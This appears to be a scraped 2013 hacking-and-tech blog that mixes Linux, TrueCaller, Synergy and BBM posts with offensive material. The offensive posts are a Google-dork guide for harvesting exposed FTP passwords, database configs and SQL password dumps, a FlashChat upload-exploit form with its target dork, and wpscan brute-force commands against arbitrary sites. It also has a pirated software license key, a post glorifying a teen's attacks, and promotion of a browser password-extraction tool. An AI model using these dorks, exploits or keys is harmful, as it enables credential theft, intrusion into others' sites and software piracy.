Friday, November 29, 2013

Linux Deepin 2013 Available For Download





Linux Deepin 2013 has been released with various improvements and enhancements as well as two new applications: Deepin Terminal and Deepin Game Center.


For those not familiar with Linux Deepin, this is a chinese Linux distribution (English ISO files are available as well) based on Ubuntu that ships with its own desktop environment based on Compiz and various applications especially designed for it, which integrate with the overall Linux Deepin look and feel.

Linux Deepin 2013 is based on Ubuntu 13.04 and it retains the main features of the previous releases: the application launcher that lets you quickly create a desktop shortcut or add an application to the dock via right click, the dock with live window previews and the stylish notifications that can be closed so they never get in your way:

Application launcher & dock

Notifications
With Linux Deepin 12.12.1, a Notification Center was introduced with lets you see a list of recent notifications:

Notification Center



Quick Linux Deepin 2013 overview


Below you can watch a quick Linux Deepin 2013 video overview:


Changes in Linux Deepin 2013


With Linux Deepin 2013, two new applications have been added by default (especially created for Linux Deepin): Deepin Terminal and Deepin Game Center:



Deepin Terminal includes features found in Terminator such as horizontal and vertical split as well as a cool workspace switcher as well as other features such as a SSH connection tool and more.

Deepin Game Center is an application you can use to play various online Flash games. Unfortunately, most of the game descriptions are in Chinese.

Other changes include:
  • updated default theme;
  • Software Center improvements (for instance, crucial system packages are protected so they can't be removed by the user);
  • DSnapshot now supports moving and resizing the selected area using the arrow keys;
  • improved power management: when watching videos in fullscreen in the browser, the display won't be turned off;
  • the Notification Center no longer logs notifications from blacklisted applications;
  • users can now log in using face recognition;
  • the dock now supports Unity quicklists;
  • the default key to bring up the application menu is now set to the Super (Windows) key;
  • users can choose whether removable devices should be mounted when plugged in;
  • according to the official release announcement, 336 bugs have been fixed since the release of.


Default applications


DMusic

DPlayer

Software Center

Linux Deepin 2013 ships with its own software center, screenshot tool (DSnapshot), music player (DMusic), video player (DPlayer) and, starting with this release, a terminal emulator and game center. But it also features applications such as: Nautilus (3.8.1), LibreOffice 4.0.2, Kingsoft Office 2013, Firefox 25.0.1, Thunderbird 24.1.1, Pidgin 2.10.7, Skype 4.3.0.11 and Google Chrome 31, among others. Furthermore, Linux Deepin comes with codecs as well as Adobe Flash installed by default, along with a proprietary Wireless Drivers setup tool.

Under the hood, Linux Deepin 12.12 uses GTK 3.8.2 - unlike Ubuntu 13.04 which ships with GTK 3.6 -, a patched Compiz 0.9.99+git, the Ubuntu Kernel 3.8.0, based on the upstream Linux Kernel 3.8.5, and Xorg server 1.13.3.


Here are a few more Linux Deepin 2013 screenshots:











Download Linux Deepin 2013


Wednesday, November 27, 2013

After Rooting Servers, Shuting Down POLICE Servers he is Blocked

After Rooting Servers, Shuting Down POLICE Servers he is Blocked by Croatian Telecom (HT).


14 Years old boy from Croatia is blocked by Croatian Telecom after Hacking WHMCS, DDOS Attack on Police servers, Rooting servers, Spaming and Phishing Paypal Accounts.


“It all started when i was 11, i started with DDoSing some little servers and Phishing, now i know a lot. I know how to take control of Private Computers or how to get sme Secret files, but thats not special, thats just beginning of Hackers Underground.
There is a lot powerful guys that have big experience with social engineering and you will trust them and click and then is game over, YOU JUST GET HACKED, DUDE ;)

How to hack Passwords with Google?

Password Hacking Using GOOGLE

Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.
Lets start, shall we ?

FTP passwords
ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.
intitle:index.of ws_ftp.ini
You can also this dork which uses “parent directory” to avoid results other than directory listings
filetype:ini ws_ftp pwd
Or
“index of/” “ws_ftp.ini” “parent directory”
even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork
“cache:www.abc.com/ws_ftp.ini”

where

www.abc.com is the site you want to check the dork for.
The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided  here.

PHP Hacking
Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.
intitle:index.of config.php
to view php file contents
intitle:”Index of” phpinfo.php
you can also try the directory traversal attack in php using the following dork
inurl:download.php?=filename
if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).
Since most websites today deny this trick, but you may get lucky with some :)

SQL Dumps
We will be hunting for SQL password dumps saved in database, here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456; one of the most common password people keep..and intext dork will allows to search inside the dump.
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:”INSERT INTO” intext:@somemail.com intext:password
Remember kids
  1. Use different email providers, substitute g mail/yahoo mail instead of some mail ,or try custom domain mail providers.
  2. Use different file extensions.
  3. Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.
  4. just mix everything up and try different combinations :)

Its not over..Yet

A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.
+htpasswd +WS_FTP.LOG filetype:log
You can substitute “+htpasswd” for “+FILENAME” & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like
phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet
The list goes on and on.. Also you cam try this dork to data mine information about the uploader
“allinurl: “some.host.com” WS_FTP.LOG filetype:log”
which tells you more about who’s uploading files to a specific site, quite handy for some passive reconnaissance.

Also..if you are one hell of a lazy b**tard ,you can do it using some software like Google Hacks..but remember, manual way is the way to go. I may have included some software specific password mining, but that would cripple your imagination. My recco ? go postal by using your imagination and developing your own dorks and queries.

ENJOY!!!!!

Tuesday, November 26, 2013

Find the name of the unknown mobile number using TrueCaller

So you have also received call/message from the unknown number right and you may have thought that is there any why to find out who is calling you ?So, in this tutorial I am going to show you how to find out the name of the unknown mobile number?

Its cool when you are able to find out the name of the person who is sending you messages/making calls. And you will be able to figure out that you should call back or not!

To find the name of unknown mobile number we will use TrueCaller! And you may wonder how this true caller works! Actually TrueCaller is the directory of the mobile number and when i have searched my number in the true caller then i thought that its not going to show my name But i was Wrong! it was showing my name Invictus Kevin and then i think its okay i am using most of the online messengers so it can be there but my brother is not using any messenger so i thought that his name will not be there! and again they proved me wrong! it was showing My brother’s name !

 How to use TrueCaller to find the name of unknown number?

 To find the name of the unknown mobile number you should open TrueCaller.

 Now add the unknown number in the box.

how to find the name of unknown mobile number














If you want to change the default country code then click on map button and add the country code of that mobile number and then hit search and when you hit search it will ask you for the Sign in, well you don’t have to fill the forum :) it will give you the options to login with the Google+, Facebook, Twitter, Yahoo! and linkedin. You can use any of the above account to sign in.

how to find the name of unknown mobile number login


















Now it will show you the name of the unknown mobile number and well its not unknown anymore as you got the name of the number :) so enjoy !

Well you can also install TrueCaller app on your mobile and it will directly show you the name of that number :) i am also using that application in my android Smartphone. 

How to remove your name from the TrueCaller ? 

how to remove my number from true caller



















Go to the unlist link from here and then simply add your mobile number with the country code, fill the verification code and then  simply hit Unlist and you have done!

Hope you Enjoyed :) :P :D
Go to the unlist link from here and then simply add your mobile number with the country code, fill the verification code and then  simply hit Unlist and you have done! - See more at: http://www.hackforsecurity.com/2013/11/find-name-of-unknown-mobile-number.html#sthash.mRkC9FYz.dpuf

Sunday, November 24, 2013

FlashChat Hacking


FlashChat Hack

#Google Dork: intitle: FlashChat v6.0.8

#Vulnerable File: upload.php

#Exploit

<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

Video:
 

Monday, November 18, 2013

Penetration Test For Wordpress Websites



How to do Penetration Test for  WordPress Website :-
How-to-do-Penetration-Test-for--WordPress-Website

Penetration testing is process of evaluating the security of Computer system or network System by simulating an attack .In this article i am going to show you How to perform penetration test for WordPress website with Kali Linux.


Navigate to Applications > Kali Linux > Web Applications > CMS identification > select wpscan .
How-to-do-Penetration-Test-for--WordPress-Website1
or enter the following command on the Terminal root@kali:~#wpscan -h


How-to-do-Penetration-Test-for--WordPress-Website1


1. Check the Installed Plugins :-
Open the Terminal and enter the following command
root@Kali:~# ruby /user/bin/wpscan  - – url www.example.com –enumerate p
In this test, i performed this test on the one of the most popular computer education site to check the installed plugins. WP-Scan found the 15 active plugins.

How-to-do-Penetration-Test-for--WordPress-Website1

2. Check the Running WordPress version :-
Open the terminal and enter the following command
 root@Kali:~# ruby /user/bin/wpscan – - url www.yourtargetsite.com 
it detects the WordPress version running on a site is 3.6.1 .

How-to-do-Penetration-Test-for--WordPress-Website1

3. Finding Username :-
Open the Terminal and enter the following command to enumerate the Username of WordPress site.
root@Kali:~# ruby /user/bin/wpscan  - – url www.yourtargetsite.com - – enumerate u
As you seen in the below image, it,s find out two users on the WordPress site.

How-to-do-Penetration-Test-for--WordPress-Website1

4. Perform Brute-force attack on “admin ” User only :-
Open the terminal and enter the following command to perform Brute force attack on the admin user.
root@Kali:~# ruby /user/bin/wpscan  - – url www.yourtargetsite.com - -wordlist yourwordlist.txt – -username admin


5. Brute Force attack on Enumerated User :-
Open the terminal and enter the following command
root@Kali:~# ruby /user/bin/wpscan  - – url www.yourtargetsite.com - -wordlist yourwordlist.txt – -threads 50


6. Use HTTP and Socks 5 Proxy during Pen-testing :-
To use a HTTP Proxy enter the following command :-
root@Kali:~# ruby /user/bin/wpscan  - – url www.yourtargetsite.com - -proxy 17.0.0.1:8118
To use a Socks 5 proxy ( cURL >= v7.21.7 needed )
root@Kali:~# ruby /user/bin/wpscan  - – url www.yourtargetsite.com - -proxy socks5://127.0.0.1:9000

If you want to test other CMS application on your Local machine.
Open your web browser and visit the Turnkey Linux website at http://www.
turnkeylinux.org
There are many applications listed here, and I would recommend trying them all
so that you can find vulnerabilities and test your skills against these applications;
however, for this recipe, we will examine WordPress. In the Instant Search box,
type WordPress:-

How-to-do-Penetration-Test-for--WordPress-Website1
On the WordPress download page, select the ISO image and once the download
completes, follow the instructions in the Getting comfortable with VirtualBox recipe
to install the Turnkey Linux WordPress virtual machine:


How-to-do-Penetration-Test-for--WordPress-Website1


 Enjoy :)



Friday, November 15, 2013

Advanced System care 7 Pro Serial Key Download

Advanced System Care is great system optimization utility which designed only improve system performance and security of your pc and laptop. Advanced System Care provides always anti-spyware, privacy protection, performance tune ups, and system cleaning.now i will share Advanced System care 7 Pro Serial Key Download link.


 

Advanced System Care 7 2013 Features :

+ Brand new user interface for easier and smoother use.
+ Auto Clean is available in FREE edition now for intelligent privacy protection and system cleaning.
+ New Surfing Protection technology supports real-time database update and parent control for safer surfing for both parents and kids.
+ New Homepage Protection function protects homepage and search engine against malicious modification.
+ New Program De-activator tool for retrieving more available system resource by disabling running programs.
+ New Skip-UAC function for faster and easier loading of the program.
* Fully upgraded Cloned Files Scanner supports removing duplicates in just one-click.
* Expanded Malware Removal database for better protection against latest malware threats.
* Enhanced Registry Fix and Vulnerability Fix for faster scanning speed and stable performance.
* Enhanced Shortcut Fixer provides faster scanning speed and richer functions.
* Improved Junk Files Clean fully supports the cleaning of Windows 8 Metro (Modern) Apps.
* Improved Disk Explorer supports removing useless downloaded files by scanning download directories.
* Improved Turbo Boost gives you more stable performance and advanced custom configuration.
* And more to be discovered by you.
                        Download Trial Version from below link
http://www.iobit.com/
• Supported OS : Win XP/2000/Vista/Win 7/8

  • License key For 6 Month: C5381-80DD2-B0C44-CD9B4

    Incoming search terms:
  • advanced system care 7 key
  • advanced system care 7 pro key
  • advanced system care 7 download
  • advanced system care 7 key 2013
  • advanced system care 7 crack download
  • download advanced system care 7 key
  • free download advanced system care 7 key
  • advanced system care 7 pro license
  • advanced system care 7 key 2013 free download
  • advanced system care 7 beta key
  • advanced system care 7 pro serial

Thursday, November 14, 2013

Social Password Decryptor-Best tool to recover social network passwords


SocialPasswordDecryptor
 



ABOUT
Social Password Decryptor is the FREE software to instantly recover Passwords for popular Social Networks such as Facebook, Twitter, Google Plus etc.

It can automatically discover and recover all the social passwords stored by web browsers & messengers including Firefox, Chrome, IE, GTalk and more.
This one tool, supports both GUI as well as command-line mode making it useful for automation & penetration testers.

It can recover passwords for following popular Social Networks,
  • Facebook
  • Twitter
  • Google Plus
  • Linkedin
  • Pinterest
  • Myspace
  • Badoo
After the successful recovery, you can backup all the social network password list to HTML/XML/TEXT file.

It works on both 32 bit & 64 bit Windows platforms starting from Windows XP to all the newer operating systems including Windows 8.



Features & Benefits

Itr can recover your Social Network passwords stored by following web browsers & messengers.
  • Firefox
  • Google Chrome
  • Internet Explorer
  • Opera Browser
  • Apple Safari
  • Flock Browser
  • Chrome SXS
  • Comodo Dragon Browser
  • CoolNovo Browser
  • SeaMonkey Browser
  • Google Talk
  • Paltalk Messenger
  • Miranda Messenger




  • Instantly decrypt and recover stored Social Network passwords
  • Recovers Passwords from popular Web Browsers & Messengers
  • Command-line version for automation & penetration testers.
  • Simple & elegant GUI interface makes it easy to use.
  • Right click context menu to quickly copy the Password
  • Sort feature to arrange the displayed passwords
  • Backup the recovered Social Network password list to HTML/XML/TEXT file.
  • Integrated Installer for assisting you in local Installation & Uninstallation.

 
Installation & Uninstallation

Social Password Decryptor comes with Installer to make it easier to install it locally on your system for regular usage. This installer has intuitive wizard which guides you through series of steps in completion of installation.

At any point of time, you can uninstall the product using the Uninstaller located at following location (by default)

[Windows 32 bit]
C:\Program Files\SecurityXploded\SocialPasswordDecryptor

[Windows 64 bit]
C:\Program Files (x86)\SecurityXploded\SocialPasswordDecryptor


 
How to Use?

SocialPasswordDecryptor is easy to use with its simple GUI interface.

Here are the brief usage details
 
Using GUI Version
  • Launch Social Password Decryptor on your system
  • Next click on 'Start Recovery' button and all stored Social Network passwords will be recovered & displayed as shown in screenshot 1 below.
  • You can right click on any of the displayed account to quickly copy the password
  • Finally you can generate detailed password recovery report in HTML/XML/Text format by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.
 
Using Command-line Version
 
Here is the typical usage of command line version
 
SocialPasswordDecryptor.exe  "<output_file path>"
 
Here are some of the examples

//Writes recovered password to text file in current directory
SocialPasswordDecryptor.exe  output.txt

//Writes recovered password to HTML file in current directory
SocialPasswordDecryptor.exe  output.html

//Writes recovered password to XML file in current directory
SocialPasswordDecryptor.exe  output.xml

//Writes recovered password to TEXT file
SocialPasswordDecryptor.exe  "c:\my test\passlist.txt"
 

It automatically detects the mode (HTML/XML/Text) by using the extension of the specified file (html/xml/txt). By default (or if no extension is specified) it uses the TEXT mode. For more examples refer to Screenshot 2 below.
 
  Download This tool from here
https://securityxploded.com/getfile_plus.php?id=9119




 
Screenshots

Screenshot 1: Social Password Decryptor showing all the Recovered Passwords for popular Social Networks.

SocialPasswordDecryptor showing recovered passwords

Screenshot 2: Command-line usage of Social Password Decryptor.

SocialPasswordDecryptor

Screenshot 3: Detailed HTML report of all the recovered Social Network Passwords

SocialPasswordDecryptor

Wednesday, November 13, 2013

Share one keyboard and mouse with multiple machines without a KVM

 
The Synergy open source application allows you to share a keyboard and mouse between Windows, Mac, and Linux computers and saves you the cost of a KVM.

There are three monitors on my desk, two of which are attached to one computer and one monitor that is attached to another computer. I have two keyboards and two mice on my desk, and switching back and forth between those keyboards caused me to have all sorts of back problems. Sure, I could use a KVM, but I didn't have one handy, so how could I lose one keyboard/mouse combo? I didn't think it was going to be possible, until I found an incredibly simple and free solution called Synergy.
Synergy is an easy to set up open source application that allows you to share a keyboard and mouse between multiple networked computers. The software allows you to share a single keyboard and mouse between Windows, Mac, and Linux computers.

What you need to use Synergy

  • At least two computers with separate monitors
  • A network connection (both machines on the same network)
  • The Synergy software

Installing and using Synergy

For this tutorial, I demonstrate how to use Synergy to share a keyboard and mouse between a Windows 7 machine and a Ubuntu Linux machine.
Install the Synergy software on both the Windows and the Linux machines. The Windows installation is simple: download the Windows .exe file, double-click it, and walk through the wizard. Follow these steps for the Linux installation:
  1. Download the installation file for Ubuntu.
  2. Open a terminal window.
  3. Change into the directory the file was downloaded into.
  4. Issue the command sudo dpkg -i synergy-XXX-Linux-xxx.deb (XXX is the release number and xxx is your system's architecture).
  5. Type your sudo password.
  6. Hit the Enter key.
When the installation for both is complete, you should start the software. When you do this, the main Synergy window will open. You have to set one instance up as the server and one as the client; we'll set up the Windows machine as the server and the Linux machine as the client.
Let's open the Windows Synergy application by going to Start | All Programs | Synergy. When the app opens, it will automatically go to the system tray. Right-click the Synergy icon (the blue and green circle) and select Show. From the new window (Figure A) make sure Server is checked. Figure A

Then click the Configure Server button in Figure A. From the Screens And Links tab in the new Server Configuration window that opens (Figure B), click the monitor icon in the upper right corner and drag it next to the center square. If the client monitor is to the right of the server, drag the client monitor to the square to the right of the server monitor. 
Figure B

Once the client icon is in place, double-click the icon and rename it. You must rename the client with the hostname of the actual client computer. When the client is configured, click the OK button and then click the Start button on the main window.
Now, over to the client machine. On Ubuntu, open the Dash and type synergy. Click the application launcher. The Synergy icon will appear in the notification area. Right-click the icon and select Show. From the main window (Figure C), do the following:
  1. Select Client.
  2. Enter the IP address of the computer acting as the Synergy server.
  3. Click the Apply button.
  4. Click the Start button.
Figure C

You should be able to grab the mouse and keyboard attached to the server machine and move it across to the client machine. After you give this amazing little app a try, report back and let us know if it makes your life easier.

Tuesday, November 12, 2013

BlackBerry Messenger (BBM) For Android Free Download


BlackBerry Messenger (BBM) For Android


Finally all the Android users can taste the flavor of BlackBerry Messenger (BBM) For Android today after the company failed to release last September 21st, 2013. The OFFICIAL version of BlackBerry Messenger (BBM) For Android from BlackBerry can now be downloaded from the link given here. Get the free BlackBerry Messenger (BBM) For Android app for the best way to stay connected with friends and family. 

Features offered by BlackBerry Messenger (BBM) For Android include: 
Chat with friends on Android, BlackBerry and iPhone:
• BlackBerry Messenger (BBM) For Android is always on and always connected – no app to open
• Know when messages have been delivered (D’s) and read (R’s)
• Share photos, files, documents, voice notes and more 
• See when contacts are responding to your message
• Emoticons for every mood and emotion let you express yourself

BlackBerry Messenger (BBM) For Android lets you protect your privacy. You control it:
• You chose how to share your information - BlackBerry Messenger (BBM) For Android uses PINs instead of phone numbers or email addresses so that it's more private and you always control who can contact you
• You chose your contacts – 2-way opt-in means you have control over who is able to message you

Chat and Share with many at once:
• Groups – BlackBerry Messenger (BBM) For Android groups help you share pictures, lists and appointments with group members. You can even be in a group with people who aren't part of your own 

BlackBerry Messenger (BBM) For Android contact list.
• Multi-person chats – Invite multiple contacts to have a chat together.
• Broadcast messages – Send a message to multiple BlackBerry Messenger (BBM) For Android contacts at one time.

Create your own BlackBerry Messenger (BBM) For Android profile:
• Post a profile picture using images, pictures or even animated pictures (GIFs).
• Update your status to let people know what you’re up to or how you feel

All Android and iPhone will then be connected to the BlackBerry Messenger (BBM) For Android service using PIN. So, have you known how to get the PIN? Read on then!
        
BlackBerry Messenger (BBM) For Android on The Official Site


How to get BlackBerry Messenger (BBM) For Android PIN for Android and iPhone users?

According to Senior Director Channel Marketing ASIA Pacific of BlackBerry, Krishnadeep Baruah; "all you need to do is simply register yourself to get the BlackBerry ID, and your ID will be converted to PIN by the BlackBerry's system".

Krishnadeep said that BlackBerry ID can also be used to sync the data of BlackBerry Messenger (BBM) For Android user.

All Android and iPhone users who previously use BlackBerry handset can get all their contact data using BB ID, so they don't need to move their data again. 

BlackBerry Messenger (BBM) For Android app can also be transferred to another handset with the help of the same BlackBerry Messenger (BBM) For Android PIN, as long as there is one activated BlackBerry Messenger (BBM) For Android ID.

The use of BlackBerry Messenger (BBM) For Android PIN is claimed to be safer to save the personal user data. They don't need to give their device number or email to anyone in order to chat in BlackBerry Messenger (BBM) For Android.

Step by Step to Set BlackBerry Messenger (BBM) For Android After Installation:


  • Create Blackberry ID here
  • Download BlackBerry Messenger (BBM) For Android from the link given below:)
  • Open BlackBerry Messenger (BBM) For Android on your phone
  • Input the email address that you registered in us.blackberry.com/bbm.html long before the official version of BlackBerry Messenger (BBM) For Android was released as seen below.  If you registered on Blackberry site at that time then you will get  message from Blackberry telling that BlackBerry Messenger (BBM) For Android is available. But if you didn't register before then you can't use BlackBerry Messenger (BBM) For Android at the moment because Blackberry wants to give priority to those who already registered. You need to wait for several days until Blackberry allow other users to use BlackBerry Messenger (BBM) For Android.
           
BlackBerry Website before  BlackBerry Messenger (BBM) For Android was Released


  • Input the BlackBerry ID that you just created in the BlackBerry Messenger (BBM) For Android
  • Fill the 'Country' and 'Date of Birth' then tap on submit
  • Take a note on the PIN number that is shown on the screen on a paper then tap on continue
  • If you want to invite your friends by PIN, SMS, or Email you can tap on the icon given but if you just want to skip this, just tap on SKIP.
  • You can set up your profile, upload profil picture, etc.
  • You are done. Enjoy BlackBerry Messenger (BBM) For Android












https://play.google.com/store/apps/details?id=com.bbm